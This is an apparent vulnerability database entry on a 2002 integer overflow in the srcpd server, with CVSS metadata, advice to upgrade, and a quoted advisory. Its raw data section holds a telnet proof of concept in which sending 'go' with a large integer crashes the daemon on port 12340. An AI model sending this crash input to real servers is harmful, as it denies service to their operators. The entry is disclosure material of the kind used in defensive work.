srcpd Integer Overflow Vulnerability

vendor:

srcpd

by:

SecurityFocus

7.5

CVSS

HIGH

Integer Overflow

190

CWE

Product Name: srcpd

Affected Version From: 2

Affected Version To: 2

Patch Exists: Yes

Related CWE: N/A

CPE: //a:srcpd

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

srcpd Integer Overflow Vulnerability

A vulnerability has been reported in srcpd that allows a remote attacker to cause a denial of service by exploiting an integer overflow error. The exploitation of this problem would consist of an attacker connecting to a server and issuing the 'go' command with a large integer value, causing an overflow condition. This issue would lead to a denial of service. Execution of arbitrary code may well be possible.

Mitigation:

Upgrade to the latest version of srcpd

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8466/info

A vulnerability has been reported in srcpd that allows a remote attacker to cause a denial of service by exploiting an integer overflow error. The exploitation of this problem would consist of an attacker connecting to a server and issuing the "go" command with a large integer value, causing an overflow condition.

This issue would lead to a denial of service. Execution of arbitrary code may well be possible.

Srcpd v2.0 has been reported to be vulnerable to this issue, however older version may be affected as well. 

>[over@localhost m00]$ telnet localhost 12340
>Trying 127.0.0.1...
>Connected to localhost.
>Escape character is '^]'.
>srcpd V2; SRCP 0.8.2
>go 11111111
>1060333759.411 200 OK GO 1
>go 11111111
>Connection closed by foreign host.
>
>[over@localhost m00]$ telnet localhost 12340
>Trying 127.0.0.1...
>telnet: connect to address 127.0.0.1: Connection refused